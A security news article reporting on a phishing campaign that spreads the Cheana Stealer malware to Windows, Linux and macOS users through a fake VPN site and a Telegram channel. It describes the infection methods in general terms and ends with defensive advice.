Cybersecurity researchers have recently discovered an elaborate phishing campaign involving the distribution of the “Cheana Stealer” malware through a VPN phishing site. This campaign is particularly concerning due to its targeting of users across various operating systems such as Windows, Linux, and macOS.
The Cheana Stealer campaign is being conducted through a phishing site that impersonates a legitimate VPN provider, specifically resembling the WarpVPN service. The site is cunningly designed to entice individuals to download VPN applications tailored for different operating systems. The attackers have gone to great lengths to create distinct versions of the Cheana Stealer for each OS, demonstrating their determination to expand their reach.
According to Cyble Research and Intelligence Lab (CRIL), the Cheana Stealer malware uses different methods to target users on Windows, Linux, and macOS. For Windows users, the malware is delivered through a PowerShell script that runs a batch file named install.bat. This script first checks for Python on the victim’s system and, if not found, installs Python along with tools like pip and virtualenv. Subsequently, it installs a malicious Python package called hclockify-win, designed to steal sensitive information such as cryptocurrency browser extensions and standalone wallets. The stolen data is then compressed into a ZIP file and sent to the attackers’ command and control server, along with extracted browser passwords.
On Linux systems, the Cheana Stealer is disseminated via a curl command that downloads a script named install-linux.sh. This script retrieves a unique ID for tracking purposes and collects sensitive information like browser data, cryptocurrency wallet details, and SSH keys, which are later exfiltrated to the attackers’ server. For macOS users, the malware is distributed through a script called install.sh, which tricks users into entering their credentials through fake prompts and gathers browser login data, macOS passwords, and Keychain information.
The phishing site associated with the Cheana Stealer campaign is linked to a Telegram channel with over 54,000 subscribers. This channel, established since at least 2018, has undergone several operator changes, with the phishing site being added to its bio in 2021. Initially offering what appeared to be free VPN services to build credibility, the channel later switched to promoting the phishing site and distributing the Cheana Stealer malware.
The Cheana Stealer campaign demonstrates a sophisticated technical strategy, where the phishing site provides detailed yet deceptive installation instructions for various operating systems, leading users to unknowingly install disguised malware. The malware’s customization for different OS and its seamless integration into the victim’s system for effective data collection make it a potent threat.
To mitigate the risks posed by phishing attacks like those from the Cheana Stealer campaign, users are advised to download software from reputable sources, raise awareness about phishing attempts, deploy advanced endpoint protection solutions, monitor network traffic, enable Multi-Factor Authentication (MFA), and maintain a robust incident response plan. The complexity of the Cheana Stealer campaign underscores the need for heightened vigilance and stringent security measures to combat evolving cyber threats.